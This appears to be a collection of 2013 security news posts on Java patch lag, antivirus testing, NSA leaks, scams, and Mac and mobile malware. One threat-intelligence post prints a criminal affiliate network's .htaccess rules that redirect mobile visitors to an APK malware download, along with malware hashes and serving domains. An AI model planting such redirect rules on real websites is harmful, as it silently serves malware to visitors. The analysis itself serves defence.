Thursday 19 September 2013

Lagging Updates Compound Java Risks

Most Windows-based devices are running Java 6. Oracle is no longer releasing patches for this version of the software, which makes machines running it vulnerable to security risks.

Protecting popular software like Java against security vulnerabilities requires three steps. First, exploits must be discovered. Second, the vendor needs to develop effective patches. Third, end users or administrators need to apply the patches to client machines.
The longer it takes for this cycle to play out, the more exposed and vulnerable it leaves users. In the case of Java, the cycle is taking too long.
That is the finding in a recent report published by Websense Security Labs, which found that over 80 percent of enterprise browsers have enabled Java clients but only 19 percent of Windows-based machines are running the latest version of Java 7. Most are running Java 6, which is no longer being patched and vulnerable to significant exploits.

Zero-day Risks

Zero-day exploits are among the most dangerous. When a malicious attacker discovers and leverages a security flaw before it has become known to the software developer, this zero-day attack can impact everyone using the software. Users remain vulnerable until a patch is developed, released and applied --- meaning that a zero-day exploit can remain dangerous for a length of time that can be counted in days, years or even forever.

For example, Microsoft recently warned that users who continue using Windows XP beyond April 8, 2014 – the OS’ end-of-support deadline – will be vulnerable to "permanent" zero-day exploits. After that date, Windows XP will never receive security patches even for newly discovered exploits.
Likewise, Java 6 was "retired" by vendor Oracle in February of this year. Its last public patch was released in April. Yet, zero-day vulnerabilities like CVE-2013-2463 and CVE-2013-2473 are out in the wild. Which means exactly what?

Crime Kits and Ransomware

They say that crime doesn’t pay, but unfortunately in the world of online malware, it actually does. Or, at least, it can. "Kits," which can be purchased or rented by aspiring evildoers and provide a user-friendly interface to launching attacks, are the latest evolution in malware.
A crime kit such as Neutrino not only gives an attacker point-and-click access to finding targets and deploying attacks, it even lets them track their success across infected machines. Attackers can access a variety of attack tools from remote screen viewers to keyloggers.
Increasingly attackers are using crime kits to install so-called "ransomware" such as Reveton. Ransomware is a type of malware which attempts to extort payment from the victim. For example, the Reveton malware claims to be a product of law enforcement accusing the target of having broken the law and requiring them to pay a “fine” to restore access to their machine.
Kits like Neutrino are regularly updated with zero-day exploits to enhance their ability to compromise targets. By definition, these exploits are available to attackers before they are patched (or possibly even known about) by vendors. Even when patches are released, they are of no use until they are not applied.
As reported by Websense, some 80 percent of enterprise Java requests are currently vulnerable to a Neutrino-launched attack.

Double-sided Defenses

Lowering these numbers, and thus improving enterprise security, is a double-sided coin for which both sides need improvement.
For IT organizations, it is easy to say "just install patches more quickly." But there are real-world challenges to consider. According to Alex Watson, director of security research at Websense, "Patch management can be a complicated and time-consuming process for organizations today. Many IT security teams lack the resources necessary to update application versions in real time."
Besides the sheer resource problem, said Watson, "new patches must be carefully tested for app compatibility." And, he added, "A single update and rush to patch could have a detrimental impact on business-critical applications."
In other words, patches can create unwanted side effects.
Watson suggests that one way for organizations to improve their ability to manage Java updates is to cull workstations that don’t strictly need Java, or a particular version of it. For example, if there are business critical applications that require the vulnerable Java 6 client, be sure that only those machines which need to run this application still possess Java 6. This at least reduces the potential attack surface area.
"Employees who do not require Java for their daily operations can either switch it off entirely or update to the most recent version," he said.
Better yet, Watson suggests organizations should pressure third-party vendors to maintain their applications to be compatible with the current state of Java. This would further reduce the need to run outdated versions of Java even on select machines.
On the vendor side of the coin, there is more Oracle can do to address the problem. First and foremost is to identify zero-day exploits more quickly and continue to reduce the vulnerable window before a patch becomes available.
Deploying the updates themselves is its own challenge. As described by Watson, "Java works across an astounding number of platforms. When Oracle rolls out an update, they are doing so across multiple operating system versions making the processes complex."
To that end, the new JDK 7u40 gives administrators control over which version of Java is used by which applications, which again helps reduce the aperture of exposure.

Set It and Don't Forget It

Java exploits are not going to disappear anytime soon. For the enterprise, the best defense comes down to reducing Java exposure and streamlining the update testing and deployment process.
Remember that by the time Oracle has developed a patch, the zero-day exploit has been in the wild for some time. Any additional time taken to deploy the patch across the enterprise is essentially a bonus for attackers.

Norton, Kaspersky, and Bitdefender Rule New Antivirus Test

Kaspersky, Norton, Bitdefender
Researchers at German lab AV-Test keep twenty-odd antivirus products under observation constantly, collating and reporting their results every couple months. They cycle between testing under Windows XP, Windows 7, and Windows 8, sometimes using 64-bit editions. The latest results, released today, relate to testing under 64-bit Windows 7. Some products scored much better than when tested under the 32-bit operating system; others lost points galore.
Three-Part Score
AV-Test assigns each product up to six points in three different areas: Protection, Performance, and Usability. To test Protection, they gather brand-new malware samples daily and note whether each antivirus identifies and blocks them, either by detecting the file's signature or by recognizing its malicious behavior. A detection-rate test using common malware also feeds into the Protection score.
The Performance rating is straightforward. The less impact a product has on system performance, the higher its score. Researchers time a number of common user activities with and without the antivirus active to calculate that impact. The activities include "visiting websites, downloading software, installing and running programs and copying data."
Usability doesn't refer to the product's user interface, but rather to possible problems antivirus protection might cause. Researchers visit hundreds of known safe websites and downgrade any product that erroneously blocks access to a site or warns that it might be dangerous. A product that identifies a valid program as malicious will likewise lose points, as will a product that displays erroneous warnings about a legitimate program.
Certification
In order to pass AV-Test's certification, a product needs a total score of 10 points or more, with at least one point in each of the three categories. All tested products did manage certification, though AhnLab and Norman squeaked by with a bare 10 points.
Because Windows itself includes antivirus protection, AV-Test doesn't list Microsoft Security Essentials as one of the tested programs. Rather, it's considered a baseline. A product that can't beat MSE is doing pretty poorly. With 9.5 points, MSE wouldn't have received certification.
Climbers and Sinkers
The test before this one was also conducted under Windows 7, but it was the 32-bit version. A drop in score between the two tests might identify a product whose 64-bit edition needs work. Norman and Kingsoft in particular lost fully 2.5 points between the 32-bit test and the 64-bit test.
Norton's designers don't approve of static malware-identification tests, and portions of the AV-Test suite do include static detection. I don't imagine they'll complain about this round of testing, though. Norton gained 2.0 points over the previous test, reaching an impressive 17 of 18 possible points. Kaspersky also took 17 points, while Bitdefender beat all the rest with 17.5 points.
Just like crash-testing for cars, independent antivirus testing lets you see how a product performs in a dangerous situation without having to enter that situation yourself.

NSA's chief Snowden took documents from internal website

Former security contractor Edward Snowden was able to obtain secret documents revealing a massive U.S. spying effort from the National Security Agency's internal website, U.S. officials said according to a report on Wednesday.
The classified documents leaked by Snowden were posted internally, and Snowden's job allowed him to single-handedly make digital copies without his supervisors' knowledge, government officials told National Public Radio.
They did not tell NPR how Snowden took copied files out of the office, citing an ongoing investigation.
"We have an extremely good idea of exactly what data he got access to and how exactly he got access to it," NSA's chief technology officer, Lonny Anderson, told NPR.
Anderson said the agency has taken steps to limit employees' options for storing data since the NSA surveillance programs were revealed.
"One thing we have done post-media leaks is lock those down hard, so those are [now] all in two-person control areas," he told NPR's "Morning Edition" program.
Snowden disclosed secret NSA programs involving the collection of telephone and email data to media outlets, including The Guardian and The Washington Post, which began publishing details in June.
He is wanted on U.S. espionage charges and is living in temporary asylum in Russia.
The NSA disclosures have raised questions about U.S. surveillance efforts and privacy as well as private contractors' clearance procedures and access to sensitive data.
But changes to data-sharing could also have national security implications given the push to share more intelligence among agencies after the September 11, 2001, attacks. Information sharing also arose as an issue in the Boston marathon bombing in April.
Anderson said other changes include limiting access to sensitive documents by "tagging" them with identifiers that will also allow supervisors to see who is viewing what data and what those individuals do with it.
The NSA's internal website still exists but it would not be possible for anyone now to make such copies without risk of detection, he added.

Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the SIM card on request

For years, cybercriminals have been abusing a rather popular, personally identifiable practice, namely, the activation of an online account for a particular service through SMS. Relying on the basic logic that a potential service user would not abuse its ToS (Terms of Service) for fraudulent or malicious purposes. Now that it associates a mobile with the account, the service continues ignoring the fact the SIM cards can be obtained by providing fake IDs, resulting in the increased probability for direct abuse of the service in a fraudulent/malicious fashion.
What are cybercriminals up to in terms of anonymous SIM cards these days? Differentiating their UVP (unique value proposition) by offering what they refer to as “VIP service” with a “personal approach” for each new client. In this post, I’ll discuss a newly launched service offering anonymous SIM cards to be used for the activation of various services requiring SMS-based activation, and emphasize on its unique UVP.

Sample screenshots of the inventory of anonymous SIM cards offered for sale:
Anonymous_SIM_Cards_Russia_Service_Activation_Fraud_Scam_Cybercrime_01 Anonymous_SIM_Cards_Russia_Service_Activation_Fraud_Scam_Cybercrime_02 Next to the inventory of cybercrime-friendly non-attributable SIM cards, the cybercriminal behind this underground market proposition is also attempting to add additional value to his proposition, by not just offering the option to store the SIM cards in safe box, but also, destroy the SIM card by offering a video proof of the actual process.
Anonymous_SIM_Cards_Russia_Service_Activation_Fraud_Scam_Cybercrime Sample screenshot of a video proof showing the destruction of an already used SIM card courtesy of the service:
Anonymous_SIM_Cards_Russia_Service_Activation_Fraud_Scam_Cybercrime_03 The service also charges a premium price for sending and receiving SMS messages, due to the value added features.
The existence and proliferation of such type of services on the basis of false identifies, directly contributes to the rise of fraudulent and malicious schemes launched on behalf of their users. Now that a pseudo-legitimate identification has taken place on popular Web site, a fraudster is in a perfect position to not just start abusing its trusted infrastructure as a foundation for launching related attacks, but also, directly targets a particular Web service’s internal users through the trusted mechanisms offered by it.
We’ll continue monitoring this underground market segment, and post updates as soon as new services offering anonymous SIM cards emerge.

Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps

Affiliate networks are an inseparable part of the cybercrime ecosystem. Largely based on their win-win revenue sharing model, throughout the years, they’ve successfully established themselves as a crucial part of the cybercrime growth model, further ensuring that a cybercriminal will indeed receive a financial incentive for his fraudulent/malicious activities online.
From pharmaceutical affiliate networks, iPhone selling affiliate networks, to affiliate networks for pirated music and OEM (Original Equipment Manufacturer) software, cybercriminals continue to professionally monetize each and every aspect of the underground marketplace, on their way to harness the experience, know-how and traffic acquisitions capabilities of fellow cybercriminals.
In this post, I’ll take a peek inside a cybercrime-friendly affiliate network for premium-rate SMS based mobile malware, list its associated numbers currently in use, provide MD5s of variants known to have been pushed by it, and discuss its business model.

Sample screenshots of the administration panel for a participant in the affiliate network for mobile malware:
What’s also worth emphasizing on next to the fact that everyone can join the affiliate network, is that the premium rate sms-sending mobile malware supports multiple operating systems, as it can expose users to .APK, .SIS and .JAR variants of the same mobile malware. The social engineering vectors of choice for the cybercriminals behind the affiliate network are as follows:
  • Fake Google Play mimicking the mobile version of the marketplace
  • Fake Adult themed videos
  • Fake Mobile Antivirus software
  • Two versions of a Fake Browser Security Update
Let’s discuss the ingenious from a scammer’s perspective ‘agreement’ that users who want to get access to the bogus/fraudulent content, automatically accept. First of all, the web sites participating in the affiliate network “assumes no responsibility for any direct or consequential loss arising from the use of the application , including loss of profits and losses“, and that’s just for starters. Whenever a socially engineered user attempts to install the rogue applications, the initial SMS he/she will send automatically results in a subscription to the service, with the rogue applications sending premium-rate SMS messages in the background.
Known mobile malware MD5s pushed by the affiliate network:
MD5: 58668c269215e6e8a781e8e7bac1b4c3 – detected by 24 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Java:SMSreg-AW [PUP]
MD5: c12d148689cfbb80b271036c260b1d91 – detected by 27 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
MD5: ead1a96f2a240987027e7935d3dfaef6 – detected by 24 out of 46 antivirus scanners as Trojan:Android/Fakeinst.T; Android:FakeInst-BH [Trj]
MD5: 306fe878ac61615c0571d34b3de733a6 – detected by 26 out of 45 antivirus scanners as Trojan.Java.Smssend.AE; HEUR:Trojan-SMS.J2ME.Agent.gen
MD5: 7fb7e22dcc91b24498f1c14e5d41a21d – detected by 26 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
Premium-rate numbers used in the campaigns:
3150; 3170; 3200; 3190; 8055; 8155; 3352; 3353; 1350; 7122; 4448; 9990; 3150; 3190; 3006; 3170; 9293; 9394; 5060; 3602; 1897; 4161; 4446; 4449; 4448; 1302; 82300
.htaccess modification suggestion to automatically serve the mobile malware to the visitor of the Web site:
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} “text/vnd.wap.wml|application/vnd.wap.xhtml+xml” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “wapp|wapr|webc|winw|winw|xda|xda-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “up.browser|up.link|windowssce|iemobile|mini|mmp” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android” [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ hxxp://browserupdate.mobi/mf/?stream=&type=apk [L,R=]
Known mobile malware serving domains part of the core infrastructure of the affiliate network:
hxxp://iosoffer.mobi/cpa/&stream= – 91.223.77.198
hxxp://mid2psys.mobi/js.php?stream= – 91.223.77.198
hxxp://browserupdate.mobi/mf/?stream= – 91.213.175.66
hxxp://playsmarket.mobi/?stream= – 91.213.175.66
hxxp://adtivirusmobile.mobi/?stream= – 91.213.175.66
hxxp://wapadults.mobi/?stream=3963 – 91.213.175.66
Responding to 91.223.77.198 are also the following domains participating in the affiliate network’s infrastructure:
allnokia88.ru
allnokia99.ru
iosoffer.mobi
mid2psys.mobi
mob-in-portal.mobi
serv-nokia.ru
Related obile malware domains known to have participated in campaigns courtesy of the same affiliate network:
3xplay.ru
adtivirusmobile.mobi
advdemo.ru
allnokia88.ru
allnokia99.ru
allwapup.ru
android4plays.ru
awtoforum.ru
browserupdate.mobi
burniyson.org
funkit-fot-you.ru
google-video.ru
htavefg.ru
java-praktika.ru
kopiivipshop.ru
lwupdate.ru
market-mobile.tk
mid2psys.mobi
mob-in-portal.mobi
mobi-fotoppz.ru
mobpornn.biz
my-hut.ru
news-top.info
newsmobi.info
opera-mini-software.ru
opera-seven.ru
operablock-in.mobi
operamini-7-5.ru
operamobi-in.mobi
operanew-in.mobi
operanew-in.ru
operaupdate-in.mobi
operaupdate-in.ru
playsmarket.mobi
poppnuha.ru
rap-schokk.ru
scaner.biz
serv-nokia.ru
shwap.mobi
soft-ipad.tk
soft-iphone.tk
sotkina.pp.ua
tutnauka.ru
update-brows.tk
vandroide.ru
wapadults.mobi
xvideos-porno.mobi
xxx-tubesex.ru
xxx4iphone.ru
xxx4mobile.ru
zonanauki.ru
We expect to continue observing in an increase of mobile mobile pushed through affiliate networks, empowering underground market participants with the managed infrastructure, the systematically rotated undetected mobile malware samples, and the actual monetization vector to take advantage of in the first place.

How to avoid unwanted software

We’ve all seen it; maybe it’s on your own computer, or that of a friend, your spouse, child, or parent. Your home page has been changed to some search engine you’ve never heard of, there’s a new, annoying toolbar in your browser. Maybe you’re getting popup ads or have a rogue security product claiming you’re infected and asking you to buy the program to remove the infection. Even worse, you don’t know how it got there! Welcome to the world of Potentially Unwanted Applications (PUAs.) Chances are that these programs were inadvertently installed while installing software from sites that use “download managers” that add additional software to otherwise free downloads.
Many of these “download managers” and the additional applications they install use a Pay Per Install business model that is often used by unscrupulous individuals that use various techniques to trick you into clicking on their sites rather than the official download site for the software you’re attempting to download. These techniques include using advertisements on search engines and various Search Engine Optimization (SEO) techniques to get their sites to show up before the official downloads in search results. We’ve even seen fake image upload sites whose sole purpose is to direct you to a page that looks like an official download page for a program but uses one of these “download managers” instead.
So how do you avoid these “download managers?” It’s actually pretty simple. Whenever possible, download software from the software company’s official page (this is not always possible since some software is only available through third-party download sites.) As mentioned earlier, some of the most popular techniques to get you to install software using these “download managers” is through ads and SEO techniques on search engines, so we’ll show you how to locate the official download links in search results from Google, Bing, and Yahoo.
For this example we’ll search for the popular voice and video chat program Skype by searching for “download Skype.”
With Google it is rather easy to spot the official download link since the advertisements are clearly marked, and the first actual result is the official download link:
google
Let’s have a look at Bing next. Since both Skype and Bing are Microsoft products, the first two search results are for the official download links:
Bing_Skype
For a better example of Bing results, let’s search for Adobe Reader by searching for “download adobe acrobat reader.” This one is also pretty easy to spot since the ads are clearly marked.
Bing_Adobe
Now let’s have a look at the results for “download Skype” on Yahoo. Once again, the ads are clearly marked and the first actual result is the official download link.
Yahoo
Looking at these search results, you’ll notice a few things in common: The top results are all ads, and none of the ads point to the official download links, and the first actual link that is not an advertisement is the official download link. While this will not always be the case, it is common, and fortunately the three search engines we used in this example all do a very good job at identifying their advertisements. Does this mean that all ads are bad? Of course not! But when looking to download free software, the ads may not be your best choice. Also pay attention to the URLs, the official downloads are all on “skype.com” domains, while all the adds point to other domains.
Now you should have a better understanding of how some of those unwanted toolbars and search pages ended up on your computer, that clicking on the top result on a search page may not be the best way to go about downloading free software, and how to find the official download links for software on some of the most popular search engines. Pass this information onto others, and maybe you’ll save yourself a trip to a friend or family member’s house to remove an unwanted toolbar.

419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams

Opportunistic 419 advance fee scammers are currently using CNN.com’s “Email This” feature to spamvertise Syrian Crysis themed emails, in an attempt to successfully bypass anti-spam filters. Ultimately tricking users into interacting with these fraudulent emails. The emails are just the tip of the iceberg in an ongoing attempt by multiple cybercrime gangs, looking to take advantage of the geopolitical situation (event-based social engineering attack) for fraudulent purposes, who continue spamming tens of thousands of emails impersonating internationally recognized agencies, on their way to socially engineer users into believing the legitimacy of these emails.

Sample screenshot of the spamvertised email:
CNN_Email_This_Article_419_Advance_Fee_Scam_Scammers_Fraud_Fraudsters_Syria_Crysis This isn’t the first time we’ve seen them abusing a legitimate Web site’s “Email This” feature. Followed by the most recent abuse of Google Calendar, we’ve also observed 419-ters abusing legitimate Web sites back in 2009 (Dilbert.com and NYTimes.com), and we believe we’ll continue seeing such type of abuse, taking into consideration the fact that 419-ers are constantly seeking for new and pragmatic ways to bypass anti-spam filters.
How to prevent falling victim to such type of attacks? Go through these tips.

Poison Apple? “Kissing” picture spreads Trojan to Mac users

A picture of a smooching couple actually delivers a kiss of death to Mac OS X users – it’s a new Mac Trojan which opens a backdoor on users’ machines. It’s the second piece of Mac malware detected in a week, and was picked up on VirusTotal, sent in by a user in Belarus.
Mac security experts Intego said in a blog post, “A new Mac Trojan has been discovered that creates a backdoor on an affected user’s machine. At the time of writing, the Command and Control (C&C) server is down and no longer sending commands to affected users. This appears to be a targeted attack, though the method of delivery is not yet known. So, while this has been affecting users in the wild, the overall threat level appears to be low.”
The Trojan attempts to download an image file of a logo for hacktivist group Syrian Electronic Army. It’s not clear whether the malware is the work of the group.
“At this time, we are unaware how it is sent to affected users,” Intego said. “The malware could likely be sent by email or placed on a website as part of a watering hole attack, for instance. Depending on how the file is received, the behavior of the file in OS X may be slightly different.”
Intego says that when installed, the Trojan attempts to conceal itself, and disguise itself as an ordinary image file, and gets to work.
“ It then opens the JPEG image inside the Application bundle with the standard OS X application Preview, which fools the user into thinking that it was just an image file.The Trojan application installs a permanent backdoor that allows the attacker to send a variety of commands,” Intego said.
In a detailed blog post exploring the myths around Mac malware, ESET Senior Researcher Stephen Cobb says, “Many people have repeated the statement that Macs can’t catch viruses. There may be a qualified sense in which that is true, but it obscures the wider reality that Macs can, and do, get hit with other forms of malicious software.”
Last week, Mac malware targeting Tibetan activists was shared on Virus Total. ESET reports on previous malware targeting Tibetan activists can be found here.
ESET Senior Research Fellow David Harley says, in a post on Mac Virus, “ I suspect that Apple will slipstream detection for [the Tibet malware] into XProtect.plist sooner rather than later. In any case, its actual spread is almost certainly as light as you’d expect from targeted malware. It seems to have crossed the AV radar because of a sample sent to VirusTotal, not as a result of user reports.”
Harley is to deliver a presentation on Mac malware at this year’s Virus Bulletin 2013 conference in Berlin, Germany, from 2-4 October.

Apple iOS 7 includes 41 security updates for iPhone and iPad

iOS 7 home screen
Apple has rolled out 41 key security updates on its latest iOS 7 mobile operating system, plugging holes that potentially left iPhone and iPad hackers open to attack.
Apple released the details of iOS 7's enhanced security features in a public post in the support section of its site. The updates address a number of the operating system's key services and code, including its certificate trust policy, data protection systems and Safari web browser.
Some of the updates address vulnerabilities that could theoretically have been used by hackers to mount a variety of attacks on iPhone users. These included arbitrary code execution, data theft and basic denial of service. A key theme in the update was increasing iOS app security systems. There is currently no evidence any of the fixed areas have been exploited by hackers.
App security has been a key feature of iOS since it was launched, with Apple opting to use a closed approach to its ecosystem, rigorously vetting apps before letting them onto its official store and locking the software to stop developers creating third-party stores. The tactic has proved successful and to date there have been no recorded mobile malware incidents on iOS.
The operating system's impressive track record led F-Secure security expert Mikko Hypponen to praise Apple for its robust security, listing the App Store as one of the security community's greatest achievements during a speech at Infosec earlier this year.
Despite the positive track record security researchers have demonstrated theoretical ways to bypass iOS security features. Most recently Georgia Institute of Technology researchers reported finding a way to sneak malware-laden applications onto the Apple app store at the Usenix Conference.
The flipside of the closed model is that Apple does not disclose any information about potential vulnerabilities until it has investigated and fixed them.
"For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available," reads Apple's disclosure policy.
The tactic is different to many software and hardware companies, which take a more open policy of alerting users to vulnerabilities in their services and systems as soon as they can. Most recently Microsoft disclosed finding a vulnerability in its Internet Explorer web browser. The more open disclosure policy is designed to help businesses and general web users take adequate short-term defence measures while the company works on a more serious, permanent solution.
Apple released a security update for its OS X computer operating system alongside its iOS release. The vulnerability lay in its Xcode 5.0 system and affected OS X Mountain Lion v10.8.4 or later. The flaw meant an attacker with a privileged network position could potentially use it to intercept sensitive information, such as user credentials.

PRISM: Facebook founder Mark Zuckerberg warns NSA snooping will damage international business

mark-zuckerberg
Facebook chief executive and founder Mark Zuckerberg has warned that NSA PRISM snooping will have financial consequences for international businesses.
Zuckerberg claimed governments' use of technology companies, such as Facebook, to spy on citizens will lead to a loss of trust with customers that will ultimately damage their ability to operate at an international level, during a speech at an event hosted by The Atlantic magazine in Washington, Reuters reported.
During the event Zuckerberg mirrored widespread calls within the security community for governments to be open about what data their spying campaigns are gathering from companies.
"What I can tell from the data that I see at Facebook is that I think the more transparency and communication [from] the government about how they're requesting the data from us, the better everyone would feel about it," he said.
"From reading in the media, you couldn't get a sense whether the number of requests that the government makes is closer to 1,000 or closer to 100 million. I think the more transparency the government has, the better folks would feel."
Ex-Navy Seal and Silent Circle chief executive officer Mike Janke made a similar claim during an interview with V3 last month, arguing that businesses, consumers and governments need to have an open conversation about what data government agencies, such as the NSA and GCHQ can collect.
Zuckerberg's comments are the latest step in Facebook's ongoing battle to publicly disclose what data requests it received from the NSA. Facebook is currently petitioning the US government to let it release information showing what data was taken from its servers.
The Facebook chief is one of many business leaders and politicians to point out the potential damage spying campaigns such as PRISM can have on countries' economies. Vice president of the European Commission and EU commissioner for justice Viviane Reding claimed that Europe's economy will suffer unless new uniform, cross-national data protection laws are created to prevent programmes such as PRISM re-occurring.

Google has access to WiFi passwords stored in Android mobile devices

Google might have the access to WiFi passwords of customers stored in Android mobile devices due a built-in feature in the Android OS.

Google company might know every WiFi password in the world used by every single Android user, and extraordinary amount of sensitive data could be exposed. According a Michael Horowitz post published on Computer Word it is engough that an Android device has ever logged onto a WiFi network.
Considering the capillary diffusion for the Android OS, that accounted for 79,3% market share at Q2 2013 according International Data Corporation, it is likely that Google can access most WiFi passwords worldwide. According privacy advocates and security experts Android OS has a built-in feature for backup mobile data including WiFi passwords.
Users that have experience with change of devices have noted the possibility to import passwords, personal data, application and device settings and login data, this is possible if they have set up Gmail address and password on their mobile. The data is encrypted and sent to Google data servers, it is accessible only when the user has an authenticated connection to Google.
 ”Android devices have defaulted to coughing up WIFi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn’t change it.” wrote Horowitz.
Google knows WiFi passwords 2
“The ‘back up my data’ option in Android is very convenient. However it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data,” wrote Micah Lee, staff technologist at privacy warrior outfit the Electronic Frontier Foundation.
Obviously users can switch off backup feature but the functionality according to many privacy experts is not properly advertised. In particular a post published on The Register highlighted the leak of information on WiFi password management for backup functionality.
“The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user’s home, and include hotels, shops, libraries, friends’ houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents.”
Recent revelations about the PRISM surveillance program and on the collaboration “requested” by US authorities to IT giants like Google increase the the concerns of users on their privacy, the interference of governments on online user’s experience has reached levels never touched before.
“Even if Google deletes every copy of your backed up data, they may already have been compelled to share it with others. And, Google will continue to have a copy of the password until every Android device that has ever connected to the network turns off the backing up of settings/data. ” states the post on ComputerWorld with explicit reference to surveillance activities operated by intelligence agencies.
The news on the WiFi password “acquired” by Google came after the recent discovery made by news agency Der Spiegel on the capability of NSA to access to data stored on Smartphone, mobile devices are a powerful instruments considered an appendix our digital and therefore preserves valuable information on our digital experience and real.
We are in the digital era, surveillance and monitoring operated by governments and private companies are becoming environmental practice to be resisted, meaningful the words of Eric Schmidt, Google CEO,on government spying: is the “nature of our society.”

NSA tried to insert backdoor into Linux

Linux Torvalds during last LinixCon admitted to have received pressure from US Intelligence to insert a backdoor into Linux.

Linux Torvalds during a question-and-answer ‪session ‬at ‪the LinuxCon publicly admitted that the US Government requested him to insert a backdoor into Linux kernel. The circumstance must induce a reflection in all those experts that believe open source software is the unique possible reply to elude surveillance programs such as PRISM and BullRun.
Torvalds, considered the father of Linux kernel, attended the Linuxcon conference in New Orleans today with other top Linux developers, he replied to question on his OS, Microsoft, and other issues related to the events occurred in the last months.

NSA tried to insert Backdoor Into Linux

The audience witnessed amused to answer provided by Torvalds to the specific question on the “call for surveillance” of the U.S. Intelligence.
Torvalds responded “no” while shaking his head “yes,”. Another participant in the conferences asked to Torvalds if he would be interested in becoming next Microsoft’s CEO, but the expert declined the idea answering with a smile, he remarked his great effort in the development of Linux that completely absorbs him.
He has spoken of the technological evolution since he started designing of Linux two decades ago, hardware platforms are changed profoundly and will change even more in the next future.
Linux usage keeps changing. Linux today is very different from even ten years ago,” “I hope it will continue to meet new use cases.” said Torvalds.
Interesting an an anecdote explained by Torvalds, when he started he didn’t have money to run Unix on his own machine. He had to learn programming to create its own cheap system.
Necessity made me try to do something,” Torvalds said

NetSuite considers European data centres as EU privacy concerns mount

NetSuite logo
SAN FRANCISCO: A heightened need for privacy in cloud computing services has had some effect on the activities of US-based cloud providers, with NetSuite "seriously considering" creating EU-based data centres to appease customer concerns. Meanwhile, Box says it hasn't seen any impact whatsoever on its European customer base.
Speaking on a panel at Box's annual BoxWorks conference, NetSuite's CTO and chairman Evan Goldberg said: "All of our data centres are in North America right now and we're starting to see the privacy issue kind of having an impact in so far on sales figures. So European servers are something we're seriously considering." He added that customers in countries such as Germany – where data privacy rules are very strict – were looking for servers at the very least based in the EU, if not in Germany.
Industry leaders from Netsuite Docusign Rackspace and Jive speaking on stage at Boxworks 2013
Goldberg (middle) discussing the future of cloud computing at BoxWorks
Goldberg's comments match EU rhetoric, with European Commission vice president Neelie Kroes saying in July that the NSA PRISM surveillance scandal – which suggested the government was granted back-door access to major internet services – would have an impact on US cloud providers.
"Front or back door, it doesn't matter. Any smart person doesn't want the information shared at all," she said. "Customers will act rationally, and providers will miss out on a great opportunity. In this case it is often American providers that will miss out, because they are often the leaders in cloud services."
Cloud collaboration firm Box, however, told V3 that it had not felt this at all, with the firm's senior vice president of engineering Sam Schillace saying that Kroes' speech was "hyperbole". He added: "European governments aren't any better – in some cases they're worse than the US government in their ability to reach in and look at user data."
Meanwhile, Box co-founder Dylan Smith said in an interview with V3 that the heightened need for security had actually favoured his company. "As security becomes more important, it actually favours us." He added that he had not yet seen Kroes' claims materialise.